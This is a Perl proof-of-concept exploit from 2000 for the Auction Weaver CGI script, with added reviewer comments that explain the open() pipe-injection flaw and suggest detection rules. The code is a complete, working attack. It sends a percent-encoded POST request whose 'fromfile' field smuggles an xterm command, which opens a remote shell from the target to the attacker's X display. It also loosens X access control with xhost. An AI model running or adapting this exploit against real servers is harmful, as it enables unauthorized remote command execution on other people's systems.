#!/usr/bin/perl -w
## Auction Weaver 1.02 / Only confirmed with LITE
## - Proof of Concept exploit -
##
## CGI Script Center have just released an update
## of Auction Weaver due to security reasons - I
## suggest that you spend some more time securing
## it, and the other scripts - It is really needed.
##
## This exploit will spawn a xterm from $target
## to $attacker. All versions of Auction Weaver
## below 1.02 is exploitable.
##
## This exploit will not work on hosts running
## Auction Weaver on NT, due to the xterm call.
##
## CGI Script Center, please contact me if you need
## help with securing your scripts...
##
## teleh0r@doglover.com / anno 2000
## http://teleh0r.cjb.net

# --- Reviewer notes (defensive reading of this PoC) ---
# The form field "fromfile" in the request body below carries a value
# wrapped in %7C ("|").  A CGI script that hands such a value to Perl's
# two-argument open() lets the leading "|" select pipe mode, i.e. the
# value is treated as a command rather than a file name -- the classic
# open() mode-injection bug.  The server-side fix is a three-argument
# open() plus allow-list validation of the file name; that auctionweaver.pl
# did exactly this is inferred from the payload, not shown on this page.
# Every alphanumeric in the body is percent-encoded (compare the plaintext
# in the commented-out "old & boring" version further down); detection
# rules must therefore normalise URL-encoding before matching, since the
# encoded and plain forms are the same request once decoded.

use strict;
use Socket;

# Expects three positional arguments: target, attacker, dpy (see the list
# assignment below).  The argument names in the usage string appear to have
# been lost when this page was rendered -- the literal is left as-is.
if (@ARGV < 3) {
    print("Usage: $0 \n");
    exit(1);
}

my($target,$attacker,$dpy,$length,$cgicode,
   $agent,$sploit,$iaddr,$paddr,$proto);

($target,$attacker,$dpy) = @ARGV;

# Unanchored check: any value containing at least one digit passes.
# $dpy is intended to be the X display number on $attacker.
if ($dpy !~ /\d/) {
    print("dpy must be a number, probably 0\n");
    exit(1);
}

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

# Adds $target to the local X server's access-control list so the
# remote xterm may connect back.  $target is interpolated unquoted into
# a shell command line here (no list-form system()).  The matching
# "xhost -" at the bottom only runs if none of the die() calls below fire.
system("xhost + $target");

# 362 is presumably the byte length of the fixed, percent-encoded part of
# $cgicode; only the two variable pieces are added.  Nothing checks this
# against length($cgicode), and the CRLF appended in send() is not counted.
$length = 362 + length($attacker.$dpy);

# elite & stealty cgicode...heh!
# In a double-quoted Perl string "\%" is just a literal "%"; the escapes
# are split across string fragments at arbitrary byte boundaries, so some
# %XX sequences only become whole after concatenation.
$cgicode = "\%66\%6c\%61\%67\%31=\%31&\%66\%72\%6f\%6d\%66".
           "\%69\%6c\%65=\%7C\%78\%74\%65\%72\%6d+\%2d\%75".
           "\%74+\%2d\%64\%69\%73\%70\%6c\%61\%79+$attacker".
           ":$dpy\%7C&\%70\%6c\%61\%63\%65\%62\%69\%64=\%31".
           "&\%63\%61\%74\%64\%69\%72=\%63\%61\%74\%31&\%75".
           "\%73\%65\%72\%6e\%61\%6d\%65=\%74\%65\%6c\%65\%".
           "68\%30\%72&\%70\%61\%73\%73\%77\%6f\%72\%64=\%6".
           "f\%68\%62\%61\%62\%79&\%62\%69\%64=\%49\%68\%61".
           "\%76\%65\%6e\%6f\%6d\%6f\%6e\%65\%79&\%6e\%6f\%".
           "62\%69\%64\%69\%74\%65\%6d=\%31&\%73\%62\%75\%7".
           "4\%74\%6f\%6e=\%42\%49\%44";

# old & boring code
#"flag1=1&fromfile=%7Cxterm+-ut+-display+$attacker%3A".
#"$dpy%7C&placebid=1&catdir=cat1&username=teleh0r&pas".
#"sword=ohbaby&bid=Ihavenomoney&nobidite=1&sbutton=BID";

# Fixed User-Agent -- a stable string a log search or signature can key on.
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# The path to auctionweaver.pl may of course need to be changed.
# Raw HTTP/1.0 request built by hand: the header lines are separated by
# the literal newlines of this string (LF, not CRLF); only the end of the
# body gets an explicit \015\012 in send() below.
$sploit= "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$cgicode";

# Plain TCP to port 80 (hard-coded) via a bareword filehandle.  Each step
# dies on failure, which also skips the "xhost -" cleanup at the bottom.
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);

# Presumably gives the server time to act on the request before the X
# access grant is revoked; the response itself is never read.
sleep(3);
system("xhost - $target");

print("\nAll done - hopefully you got the flying xterm!\n");
exit(0)
# www.hack.co.za [7 September 2000]#